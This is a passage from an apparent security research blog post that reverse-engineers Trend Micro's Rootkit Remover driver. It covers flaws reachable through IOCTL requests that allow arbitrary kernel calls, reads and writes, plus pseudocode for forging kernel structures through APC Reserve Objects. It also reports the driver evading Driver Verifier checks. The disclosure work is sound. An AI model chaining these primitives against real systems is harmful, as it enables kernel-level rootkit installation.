</code></pre><p>The config data stores the location of internal/undocumented variables in the Windows Kernel such as <code>IopRootDeviceNode</code>, <code>PpDevNodeLockTree</code>, <code>ExInitializeNPagedLookasideListInternal</code>, and <code>ExDeleteNPagedLookasideList</code>. My educated guess is that the purpose of this class is to access low-level devices directly rather than use documented methods which could be hijacked.</p><h2 id="ioctl-requests">IOCTL Requests</h2><p>Before we get into what the driver allows us to do, we need to understand how IOCTL requests are handled.</p><p>In the primary dispatch function, the Trend Micro driver converts the data alongside an <code>IRP_MJ_DEVICE_CONTROL</code> request to a proprietary structure I call a <code>TmIoctlRequest</code>.</p><pre><code class="language-c++">struct TmIoctlRequest
{
	DWORD InputSize;
	DWORD OutputSize;
	PVOID UserInputBuffer;
	PVOID UserOutputBuffer;
	PVOID Unused;
	DWORD_PTR* BytesWritten;
};
</code></pre><p>The way Trend Micro organized dispatching of IOCTL requests is by having several &quot;dispatch tables&quot;. The &quot;base dispatch table&quot; simply contains an IOCTL Code and a corresponding &quot;sub dispatch function&quot;. For example, when you send an IOCTL request with the code <code>0xDEADBEEF</code>, it will compare each entry of this base dispatch table and pass along the data if there is a table entry that has the matching code. A base table entry can be represented by the structure below:</p><pre><code class="language-c++">typedef NTSTATUS (__fastcall *DispatchFunction_t)(TmIoctlRequest *IoctlRequest);

struct BaseDispatchTableEntry
{
	DWORD_PTR IOCode;
	DispatchFunction_t DispatchFunction;
};
</code></pre><p>After the <code>DispatchFunction</code> is called, it typically verifies some of the data provided ranging from basic <code>nullptr</code> checks to checking the size of the input and out buffers. These &quot;sub dispatch functions&quot; then do another lookup based on a code passed in the user input buffer to find the corresponding &quot;sub table entry&quot;. A sub table entry can be represented by the structure below:</p><pre><code class="language-c++">typedef NTSTATUS (__fastcall *OperationFunction_t)(PVOID InputBuffer, PVOID OutputBuffer);

struct SubDispatchTableEntry
{
	DWORD64 OperationCode;
	OperationFunction_t PrimaryRoutine;
	OperationFunction_t ValidatorRoutine;
};
</code></pre><p>Before calling the <code>PrimaryRoutine</code>, which actually performs the requested action, the sub dispatch function calls the <code>ValidatorRoutine</code>. This routine does &quot;action-specific&quot; validation on the input buffer, meaning that it performs checks on the data the <code>PrimaryRoutine</code> will be using. Only if the <code>ValidatorRoutine</code> returns successfully will the <code>PrimaryRoutine</code> be called.</p><p>Now that we have a basic understanding of how IOCTL requests are handled, let&apos;s explore what they allow us to do. Referring back to the definition of the &quot;base dispatch table&quot;, which stores &quot;sub dispatch functions&quot;, let&apos;s explore each base table entry and figure out what each sub dispatch table allows us to do!</p><h2 id="iocontrolcode-9000402bh">IoControlCode == 9000402Bh</h2><h3 id="discovery-1">Discovery</h3><p>This first dispatch table appears to interact with the filesystem, but what does that actually mean? To start things off, the code for the &quot;sub dispatch table&quot; entry is obtained by dereferencing a <code>DWORD</code> from the start of the input buffer. This means that to specify which sub dispatch entry you&apos;d like to execute, you simply need to set a <code>DWORD</code> at the base of the input buffer to correspond with that entry&apos;s <code>OperationCode</code>.</p><p>To make our lives easier, Trend Micro conveniently included a significant number of debugging strings, often giving an idea of what a function does. Here is a table of the functions I reversed in this sub dispatch table and what they allow us to do.</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th><strong>OperationCode</strong></th>
<th><strong>PrimaryRoutine</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>2713h</td>
<td>IoControlCreateFile</td>
<td>Calls NtCreateFile, all parameters are controlled by the request.</td>
</tr>
<tr>
<td>2711h</td>
<td>IoControlFindNextFile</td>
<td>Returns STATUS_NOT_SUPPORTED.</td>
</tr>
<tr>
<td>2710h</td>
<td>IoControlFindFirstFile</td>
<td>Performs nothing, returns STATUS_SUCCESS always.</td>
</tr>
<tr>
<td>2712h</td>
<td>IoControlFindCloseFile</td>
<td>Calls ZwClose, all parameters are controlled by the request.</td>
</tr>
<tr>
<td>2715h</td>
<td>IoControlReadFileIRPNoCache</td>
<td>References a FileObject using HANDLE from request. Calls IofCallDriver and reads result.</td>
</tr>
<tr>
<td>2714h</td>
<td>IoControlCreateFileIRP</td>
<td>Creates a new FileObject and associates DeviceObject for requested drive.</td>
</tr>
<tr>
<td>2716h</td>
<td>IoControlDeleteFileIRP</td>
<td>Deletes a file by sending an IRP_MJ_SET_INFORMATION request.</td>
</tr>
<tr>
<td>2717h</td>
<td>IoControlGetFileSizeIRP</td>
<td>Queries a file&apos;s size by sending an IRP_MJ_QUERY_INFORMATION request.</td>
</tr>
<tr>
<td>2718h</td>
<td>IoControlSetFilePosIRP</td>
<td>Set&apos;s a file&apos;s position by sending an IRP_MJ_SET_INFORMATION request.</td>
</tr>
<tr>
<td>2719h</td>
<td>IoControlFindFirstFileIRP</td>
<td>Returns STATUS_NOT_SUPPORTED.</td>
</tr>
<tr>
<td>271Ah</td>
<td>IoControlFindNextFileIRP</td>
<td>Returns STATUS_NOT_SUPPORTED.</td>
</tr>
<tr>
<td>2720h</td>
<td>IoControlQueryFile</td>
<td>Calls NtQueryInformationFile, all parameters are controlled by the request.</td>
</tr>
<tr>
<td>2721h</td>
<td>IoControlSetInformationFile</td>
<td>Calls NtSetInformationFile, all parameters are controlled by the request.</td>
</tr>
<tr>
<td>2722h</td>
<td>IoControlCreateFileOplock</td>
<td>Creates an Oplock via IoCreateFileEx and other filesystem API.</td>
</tr>
<tr>
<td>2723h</td>
<td>IoControlGetFileSecurity</td>
<td>Calls NtCreateFile and then ZwQuerySecurityObject. All parameters are controlled by the request.</td>
</tr>
<tr>
<td>2724h</td>
<td>IoControlSetFileSecurity</td>
<td>Calls NtCreateFile and then ZwSetSecurityObject. All parameters are controlled by the request.</td>
</tr>
<tr>
<td>2725h</td>
<td>IoControlQueryExclusiveHandle</td>
<td>Check if a file is opened exclusively.</td>
</tr>
<tr>
<td>2726h</td>
<td>IoControlCloseExclusiveHandle</td>
<td>Forcefully close a file handle.</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><h2 id="iocontrolcode-90004027h">IoControlCode == 90004027h</h2><h3 id="discovery-2">Discovery</h3><p>This dispatch table is primarily used to control the driver&apos;s <em>process</em> scanning features. Many functions in this sub dispatch table use a separate scanning thread to synchronously search for processes via various methods both documented and undocumented.</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th><strong>OperationCode</strong></th>
<th><strong>PrimaryRoutine</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>C350h</td>
<td>GetProcessesAllMethods</td>
<td>Find processes via ZwQuerySystemInformation and WorkingSetExpansionLinks.</td>
</tr>
<tr>
<td>C351h</td>
<td>DeleteTaskResults*</td>
<td>Delete results obtained through other functions like GetProcessesAllMethods.</td>
</tr>
<tr>
<td>C358h</td>
<td>GetTaskBasicResults*</td>
<td>Further parse results obtained through other functions like GetProcessesAllMethods.</td>
</tr>
<tr>
<td>C35Dh</td>
<td>GetTaskFullResults*</td>
<td>Completely parse results obtained through other functions like GetProcessesAllMethods.</td>
</tr>
<tr>
<td>C360h</td>
<td>IsSupportedSystem</td>
<td>Returns TRUE if the system is &quot;supported&quot; (whether or not they have hardcoded offsets for your build).</td>
</tr>
<tr>
<td>C361h</td>
<td>TryToStopTmComm</td>
<td>Attempt to stop the driver.</td>
</tr>
<tr>
<td>C362h</td>
<td>GetProcessesViaMethod</td>
<td>Find processes via a specified method.</td>
</tr>
<tr>
<td>C371h</td>
<td>CheckDeviceStackIntegrity</td>
<td>Check for tampering on devices associated with physical drives.</td>
</tr>
<tr>
<td>C375h</td>
<td>ShouldRequireOplock</td>
<td>Returns TRUE if oplocks should be used for certain scans.</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p>These IOCTLs revolve around a few structures I call &quot;MicroTask&quot; and &quot;MicroScan&quot;. Here are the structures reverse-engineered:</p><pre><code class="language-c">struct MicroTaskVtable
{
	PVOID Constructor;
	PVOID NewNode;
	PVOID DeleteNode;
	PVOID Insert;
	PVOID InsertAfter;
	PVOID InsertBefore;
	PVOID First;
	PVOID Next;
	PVOID Remove;
	PVOID RemoveHead;
	PVOID RemoveTail;
	PVOID unk2;
	PVOID IsEmpty;
};

struct MicroTask
{
	MicroTaskVtable* vtable;
	PVOID self1; // ptr to itself.
	PVOID self2; // ptr to itself.
	DWORD_PTR unk1;
	PVOID MemoryAllocator;
	PVOID CurrentListItem;
	PVOID PreviousListItem;
	DWORD ListSize;
	DWORD unk4; // Initialized as NULL.
	char ListName[50];
};

struct MicroScanVtable
{
	PVOID Constructor;
	PVOID GetTask;
};

struct MicroScan
{
	MicroScanVtable* vtable;
	DWORD Tag; // Always &apos;PANS&apos;.
	char pad1[4];
	DWORD64 TasksSize;
	MicroTask Tasks[4];
};
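// Hypothetical illustration (my own naming, not a structure from the
// driver): the minimal object an attacker must forge is just a vtable
// pointer followed by the 'PANS' tag, since nothing past the tag is
// validated before a function from the vtable is invoked.
struct FakeMicroScan
{
	MicroScanVtable* vtable; // attacker-controlled function pointers
	DWORD Tag;               // must equal 'PANS' to pass the tag check
};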
</code></pre><p>For most of the IOCTLs in this sub dispatch table, the client passes in a MicroScan that the driver populates. We&apos;ll look into how we can abuse this trust in the next section.</p><h3 id="exploitation">Exploitation</h3><p>When I was initially reverse engineering the functions in this sub dispatch table, I was quite confused because the code &quot;didn&apos;t seem right&quot;. It appeared that the <code>MicroScan</code> kernel pointer returned by functions such as <code>GetProcessesAllMethods</code> was being directly passed on to other functions such as <code>DeleteTaskResults</code> by <em>the client</em>. These functions would then take this untrusted kernel pointer and, with almost no validation, call functions in the virtual function table specified at the base of the class.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/YWVMaiq.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Taking a look at the &quot;validation routine&quot; for the <code>DeleteTaskResults</code> sub dispatch table entry, the only validation performed on the <code>MicroScan</code> instance specified at the input buffer <code>+ 0x10</code> was making sure it was a valid kernel address.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/prYMsTu.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/frO0gIU.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/xBykufH.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>The only other check besides making sure that the supplied pointer was in kernel memory was a simple check in 
<code>DeleteTaskResults</code> to make sure the <code>Tag</code> member of the <code>MicroScan</code> is <code>PANS</code>.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/fAOzNKR.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Since <code>DeleteTaskResults</code> calls the constructor specified in the virtual function table of the <code>MicroScan</code> instance, to call an arbitrary kernel function we need to:</p><ol><li>Be able to allocate at least 12 bytes of kernel memory (an 8-byte vtable pointer plus the 4-byte tag).</li><li>Control the allocated kernel memory to set the virtual function table pointer and the tag.</li><li>Be able to determine the address of this kernel memory from user-mode.</li></ol><p>Fortunately, a mentor of mine, <a href="https://twitter.com/aionescu">Alex Ionescu</a>, was able to point me in the right direction when it comes to allocating and controlling kernel memory from user-mode. A <a href="http://magazine.hitb.org/issues/HITB-Ezine-Issue-003.pdf">HackInTheBox Magazine</a> from 2010 had an article by <a href="https://twitter.com/j00ru">Mateusz Jurczyk</a> called &quot;Reserve Objects in Windows 7&quot;. This article discussed using APC Reserve Objects, which were introduced in Windows 7, to allocate controllable kernel memory from user-mode. The general idea is that you can queue an APC to an APC Reserve Object with the <code>ApcRoutine</code> and <code>ApcArgumentX</code> members being the data you want in kernel memory and then use <code>NtQuerySystemInformation</code> to find the APC Reserve Object in kernel memory. This reserve object will have the previously specified <code>KAPC</code> variables in a row, allowing a user-mode application to control up to 32 bytes of kernel memory (on 64-bit) and know the location of the kernel memory. 
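For concreteness, the technique is roughly the following (pseudocode only; these NT system calls are undocumented, so treat the prototypes and enum names here as assumptions based on publicly available reversing work rather than an official API):

```c
// 1. Allocate a user APC reserve object.
NtAllocateReserveObject(&ReserveHandle, NULL, MemoryReserveUserApc);

// 2. Queue an APC through it. The ApcRoutine and ApcArgument values land
//    in adjacent pointer-sized fields of the kernel KAPC, which is what
//    lets us treat them as a controlled "kernel structure" (e.g. a fake
//    vtable pointer followed by the 'PANS' tag).
NtQueueApcThreadEx(NtCurrentThread(), ReserveHandle,
                   (PPS_APC_ROUTINE)FakeVtablePointer,
                   (PVOID)FakeTagValue, NULL, NULL);

// 3. Leak the KAPC's kernel address by matching ReserveHandle against
//    the handle list returned by NtQuerySystemInformation's handle
//    information classes.
```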
I would strongly suggest reading the article if you&apos;d like to learn more.</p><p>This trick still works in Windows 10, meaning we&apos;re able to meet all three requirements. By using an APC Reserve Object, we can allocate enough controlled kernel memory for the fake <code>MicroScan</code> structure and bypass the inadequate checks completely. The result? The ability to call arbitrary kernel pointers:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/XlE43il.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Although I provided a specific example of vulnerable code in <code>DeleteTaskResults</code>, all of the functions I marked in the table with asterisks are vulnerable. They all trust the kernel pointer specified by the untrusted client and end up calling a function in the <code>MicroScan</code> instance&apos;s virtual function table.</p><h2 id="iocontrolcode-90004033h">IoControlCode == 90004033h</h2><h3 id="discovery-3">Discovery</h3><p>This next sub dispatch table primarily manages the TrueApi class we reviewed before.</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th><strong>OperationCode</strong></th>
<th><strong>PrimaryRoutine</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>EA60h</td>
<td>IoControlGetTrueAPIPointer</td>
<td>Retrieve pointers of functions in the TrueApi class.</td>
</tr>
<tr>
<td>EA61h</td>
<td>IoControlGetUtilityAPIPointer</td>
<td>Retrieve pointers of utility functions of the driver.</td>
</tr>
<tr>
<td>EA62h</td>
<td>IoControlRegisterUnloadNotify*</td>
<td>Register a function to be called on unload.</td>
</tr>
<tr>
<td>EA63h</td>
<td>IoControlUnRegisterUnloadNotify</td>
<td>Unload a previously registered unload function.</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><h3 id="exploitation-1">Exploitation</h3><h3 id="iocontrolregisterunloadnotify">IoControlRegisterUnloadNotify</h3><p>This function caught my eye the moment I saw its name in a debug string. Using this sub dispatch table function, an <em>untrusted client</em> can register up to 16 arbitrary &quot;unload routines&quot; that get called when the driver unloads. This function&apos;s validator routine checks this pointer from the untrusted client buffer for validity. If the caller is from user-mode, the validator calls <code>ProbeForRead</code> on the untrusted pointer. If the caller is from kernel-mode, the validator checks that it is a valid kernel memory address.</p><p>This function cannot immediately be used in an exploit from user-mode. The problem is that if we&apos;re a user-mode caller, we <em>must</em> provide a user-mode pointer, because the validator routine uses <code>ProbeForRead</code>. When the driver unloads, this user-mode pointer gets called, but it won&apos;t do much because of mitigations such as <a href="https://en.wikipedia.org/wiki/Supervisor_Mode_Access_Prevention">SMEP</a>. I&apos;ll reference this function in a later section, but it is genuinely scary to see an untrusted user-mode client being able to direct a driver to call an arbitrary pointer <em>by design</em>.</p><h2 id="iocontrolcode-900040dfh">IoControlCode == 900040DFh</h2><p>This sub dispatch table is used to interact with the XrayApi. Although the Xray Api is generally used by scans implemented in the kernel, this sub dispatch table provides limited access for the client to interact with physical drives.</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th><strong>OperationCode</strong></th>
<th><strong>PrimaryRoutine</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>15F90h</td>
<td>IoControlReadFile</td>
<td>Read a file directly from a disk.</td>
</tr>
<tr>
<td>15F91h</td>
<td>IoControlUpdateCoreList</td>
<td>Update the kernel pointers used by the Xray Api.</td>
</tr>
<tr>
<td>15F92h</td>
<td>IoControlGetDRxMapTable</td>
<td>Get a table of drives mapped to their corresponding devices.</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><h2 id="iocontrolcode-900040e7h">IoControlCode == 900040E7h</h2><h3 id="discovery-4">Discovery</h3><p>The final sub dispatch table is used to scan for hooks in a variety of system structures. It was interesting to see the variety of hooks Trend Micro checks for, including hooks in object types, major function tables, and even function inline hooks.</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th><strong>OperationCode</strong></th>
<th><strong>PrimaryRoutine</strong></th>
<th><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>186A0h</td>
<td>TMXMSCheckSystemRoutine</td>
<td>Check a few system routines for hooks.</td>
</tr>
<tr>
<td>186A1h</td>
<td>TMXMSCheckSystemFileIO</td>
<td>Check file IO major functions for hooks.</td>
</tr>
<tr>
<td>186A2h</td>
<td>TMXMSCheckSpecialSystemHooking</td>
<td>Check the file object type and ntoskrnl Io functions for hooks.</td>
</tr>
<tr>
<td>186A3h</td>
<td>TMXMSCheckGeneralSystemHooking</td>
<td>Check the Io manager for hooks.</td>
</tr>
<tr>
<td>186A4h</td>
<td>TMXMSCheckSystemObjectByName</td>
<td>Recursively trace a system object (either a directory or symlink).</td>
</tr>
<tr>
<td>186A5h</td>
<td>TMXMSCheckSystemObjectByName2*</td>
<td>Copy a system object into user-mode memory.</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><h3 id="exploitation-2">Exploitation</h3><p>Yeah, <code>TMXMSCheckSystemObjectByName2</code> is as bad as it sounds. Before looking at the function directly, here are a few reverse-engineered structures used later:</p><pre><code class="language-c++">struct CheckSystemObjectParams
{
    PVOID Src;
    PVOID Dst;
    DWORD Size;
    DWORD* OutSize;
};

struct TXMSParams
{
    DWORD OutStatus;
    DWORD HandlerID;
    CHAR unk[0x38];
    CheckSystemObjectParams* CheckParams;
};
</code></pre><p><code>TMXMSCheckSystemObjectByName2</code> takes in a source pointer, a destination pointer, and a size in bytes. The validator function called for <code>TMXMSCheckSystemObjectByName2</code> checks the following:</p><ul><li><code>ProbeForRead</code> on the <code>CheckParams</code> member of the <code>TXMSParams</code> structure.</li><li><code>ProbeForRead</code> and <code>ProbeForWrite</code> on the <code>Dst</code> member of the <code>CheckSystemObjectParams</code> structure.</li></ul><p>Essentially, this means that we need to pass a valid <code>CheckParams</code> structure and that the <code>Dst</code> pointer we pass must point to user-mode memory. Now let&apos;s look at the function itself:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/SbCqJRm.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Although that for loop may seem scary, all it is doing is an optimized check of a range of kernel memory: for every memory page in the range <code>Src</code> to <code>Src + Size</code>, the function calls <code>MmIsAddressValid</code>. The real scary part is the following operations:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/dCtvqs9.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>These lines take an untrusted <code>Src</code> pointer and copy <code>Size</code> bytes to the untrusted <code>Dst</code> pointer... yikes. We can use the <code>memmove</code> operations to read from an arbitrary kernel pointer, but what about writing to an arbitrary kernel pointer? The problem is that the validator for <code>TMXMSCheckSystemObjectByName2</code> requires that the destination is user-mode memory. 
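To make the primitive concrete, here is a small user-mode simulation (my own code, not the driver's) of the copy logic just described: only the destination is constrained, so whatever the source points to is leaked to the caller. A static buffer stands in for kernel memory.

```c
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for the reversed CheckSystemObjectParams above. */
struct SimCheckParams {
    void     *Src;     /* unchecked: any "kernel" address in the driver */
    void     *Dst;     /* only checked to be user-mode memory           */
    uint32_t  Size;
    uint32_t *OutSize;
};

/* Simulation of the vulnerable copy: note there is no check that Src
 * is something the caller should be allowed to read. */
static void check_system_object_sim(struct SimCheckParams *p)
{
    memmove(p->Dst, p->Src, p->Size); /* arbitrary read */
    *p->OutSize = p->Size;
}

/* "Secret" buffer standing in for kernel memory the caller
 * should never be able to see. */
static const char g_kernel_secret[16] = "PASSWORD1234567";

/* What an attacker-controlled client effectively gets to do. */
int read_kernel_sim(char *out, uint32_t size)
{
    uint32_t out_size = 0;
    struct SimCheckParams p = {
        (void *)g_kernel_secret, out, size, &out_size
    };
    check_system_object_sim(&p);
    return (int)out_size;
}
```

In the real driver the source would be an actual kernel pointer and the destination the caller's user-mode buffer; the simulation only illustrates that nothing ties the two together.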
Fortunately, there is another bug in the code.</p><p>The next <code>*params-&gt;OutSize = Size;</code> line takes the <code>Size</code> member from our structure and places it at the pointer specified by the untrusted <code>OutSize</code> member. No verification is done on what <code>OutSize</code> points to, thus we can write up to a DWORD with each IOCTL call. One caveat is that the <code>Src</code> pointer would need to point to valid kernel memory for up to <code>Size</code> bytes. To meet this requirement, I just passed the base of the <code>ntoskrnl</code> module as the source.</p><p>Using this arbitrary write primitive, we can use the previously found unload routines trick to execute code. Although the validator routine prevents us from passing in a kernel pointer if we&apos;re calling from user-mode, we don&apos;t actually need to go through the validator. Instead, we can write to the unload routine array inside of the driver&apos;s <code>.data</code> section using our write primitive and place the pointer we want.</p><h2 id="really-really-bad-code">Really, <em>really</em> bad code</h2><p>Typically, I like sticking strictly to security in my blog posts, but this driver made me break that tradition. In this section, we won&apos;t be covering the security issues of the driver, but rather the terrible code that&apos;s used by millions of Trend Micro customers around the world.</p><h2 id="bruteforcing-processes">Bruteforcing Processes</h2><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/4EpzRLr.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Let&apos;s take a look at what&apos;s happening here. This function has a for loop from 0 to 0x10000, incrementing by 4, and retrieves the object of the process behind the current index (if there is one). If the index does match a process, the function checks if the name of the process is <code>csrss.exe</code>. 
If the process is named <code>csrss.exe</code>, the final check is that the session ID of the process is 0. Come on guys, there is literally a documented API to enumerate processes from the kernel... what&apos;s the point of bruteforcing?</p><h2 id="bruteforcing-offsets">Bruteforcing Offsets</h2><h3 id="eprocess-imagefilename-offset">EPROCESS ImageFileName Offset</h3><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/LsjwpSy.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>When I first saw this code, I wasn&apos;t sure what I was looking at. The function takes the current process, which happens to be the System process since this is called in a System thread, and then searches for the string &quot;System&quot; in the first 0x1000 bytes. What&apos;s happening is... Trend Micro is bruteforcing the <code>ImageFileName</code> member of the <code>EPROCESS</code> structure by looking for the known name of the System process inside of its <code>EPROCESS</code> structure. If you wanted the <code>ImageFileName</code> of a process, just use <code>ZwQueryInformationProcess</code> with the <code>ProcessImageFileName</code> class...</p><h3 id="eprocess-peb-offset">EPROCESS Peb Offset</h3><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/PGqgkLm.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>In this function, Trend Micro uses the PID of the <code>csrss</code> process to brute force the <code>Peb</code> member of the <code>EPROCESS</code> structure. The function retrieves the <code>EPROCESS</code> object of the <code>csrss</code> process by using <code>PsLookupProcessByProcessId</code> and it retrieves the <code>PebBaseAddress</code> by using <code>ZwQueryInformationProcess</code>. Using those pointers, it tries every offset from 0 to 0x2000 until it finds the one that matches the known <code>Peb</code> pointer. 
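This offset-bruteforcing pattern is easy to demonstrate in plain user-mode C (a simulation of the idea, not Trend Micro's code): scan a structure for a value you already obtained through a supported API, and call the position where you find it the member's offset.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Brute force the offset of a known pointer-sized value inside an
 * opaque structure, the same way the driver recovers EPROCESS.Peb:
 * it already knows the answer (from ZwQueryInformationProcess) and
 * simply scans for it. Returns -1 if not found within limit bytes. */
ptrdiff_t find_member_offset(const void *object, size_t limit,
                             const void *known_value)
{
    const uint8_t *bytes = (const uint8_t *)object;
    for (size_t offset = 0; offset + sizeof(void *) <= limit; offset++) {
        if (memcmp(bytes + offset, &known_value, sizeof(void *)) == 0)
            return (ptrdiff_t)offset;
    }
    return -1;
}
```

The simulation also makes the fragility obvious: the scan happily returns the first coincidental match, which is exactly why hardcoded or brute-forced offsets break between builds.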
What&apos;s the point of finding the offset of the <code>Peb</code> member when you can just use <code>ZwQueryInformationProcess</code>, as you already do...</p><h3 id="ethread-startaddress-offset">ETHREAD StartAddress Offset</h3><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/NFEDMzz.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Here Trend Micro uses the current system thread with a known start address to brute force the <code>StartAddress</code> member of the <code>ETHREAD</code> structure. Another case where finding the raw offset is unnecessary. There is a semi-documented class of <code>ZwQueryInformationThread</code> called <code>ThreadQuerySetWin32StartAddress</code> which gives you the start address of a thread.</p><h2 id="unoptimized-garbage">Unoptimized Garbage</h2><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/dwwDBkM.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>When I initially decompiled this function, I thought IDA Pro might be simplifying a <code>memset</code> operation, because all this function was doing was setting all of the <code>TrueApi</code> structure members to zero. I decided to take a peek at the assembly to confirm I wasn&apos;t missing something...</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/r6CCzqz.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Yikes... looks like someone turned off optimizations.</p><h2 id="cheating-microsoft-s-whql-certification">Cheating Microsoft&apos;s WHQL Certification</h2><p>So far we&apos;ve covered methods to read and write arbitrary kernel memory, but there is one step missing to install our own rootkit. 
Although you could execute kernel shellcode with just a read/write primitive, I generally like finding the path of least resistance. Since this is a third-party driver, chances are there is some <code>NonPagedPool</code> memory allocated which we can use to host and execute our malicious shellcode.</p><p>Let&apos;s take a look at how Trend Micro allocates memory. Early in the entrypoint of the driver, Trend Micro checks if the machine is a &quot;supported system&quot; by checking the major version, minor version, and the build number of the operating system. Trend Micro does this because they hardcode several offsets which can change between builds.</p><p>Fortunately, the <code>PoolType</code> global variable, which is used to allocate non-paged memory, is set to 0 (<code>NonPagedPool</code>) by default. I noticed that although this value was 0 initially, the variable was still in the <code>.data</code> section, meaning it could be changed. When I looked at what wrote to the variable, I saw that the same function responsible for checking the operating system&apos;s version also set this <code>PoolType</code> variable in certain cases.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/40RpeFI.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>From a brief glance, it looked like if our operating system is Windows 10 or a newer version, the driver prefers to use <code>NonPagedPoolNx</code>. Good from a security standpoint, but bad for us. This is used for all non-paged allocations, meaning we would have to find a spare <code>ExAllocatePoolWithTag</code> call that had a hardcoded <code>NonPagedPool</code> argument; otherwise, we couldn&apos;t use the driver&apos;s allocated memory on Windows 10. But it&apos;s not that straightforward. 
What about <code>MysteriousCheck()</code>, the second requirement for this if statement?</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/4BfxtU6.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>What <code>MysteriousCheck()</code> was doing was checking if <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/driver-verifier">Microsoft&apos;s Driver Verifier</a> was enabled... Instead of just using <code>NonPagedPoolNx</code> on Windows 8 or higher, <strong>Trend Micro placed an explicit check to only use secure memory allocations if they&apos;re being watched</strong>. Why is this not just an example of bad code? Trend Micro&apos;s driver is <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature">WHQL certified</a>:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/3LRyv0a.png" class="kg-image" alt="How to use Trend Micro&apos;s Rootkit Remover to Install a Rootkit" loading="lazy"></figure><p>Passing Driver Verifier has been a long-time requirement of obtaining WHQL certification. On Windows 10, Driver Verifier enforces that drivers do not allocate executable memory. Instead of complying with this requirement designed to secure Windows users, <strong>Trend Micro decided to ignore their users&apos; security and designed their driver to cheat any testing or debugging environment which would catch such violations</strong>.</p><p>Honestly, I&apos;m dumbfounded. I don&apos;t understand why Trend Micro would go <em>out of their way</em> to cheat in these tests. Trend Micro could have just left the Windows 10 check; why would you even bother creating an explicit check for Driver Verifier? 
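Reconstructed as a sketch (the function name and parameters are my own; the constants are the documented POOL_TYPE values), the decision the driver makes amounts to:

```c
/* Real POOL_TYPE values from the WDK: NonPagedPool is executable
 * non-paged pool, NonPagedPoolNx (0x200) is the no-execute variant. */
enum { NonPagedPool = 0, NonPagedPoolNx = 512 };

/* Hedged reconstruction of the behavior described above: the
 * no-execute pool is chosen only when the driver believes it is
 * being observed by Driver Verifier on a modern Windows build. */
int choose_pool_type(int is_windows10_or_newer, int verifier_enabled)
{
    if (is_windows10_or_newer && verifier_enabled)
        return NonPagedPoolNx;  /* "secure" path, only under observation */
    return NonPagedPool;        /* executable pool for everyone else     */
}
```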
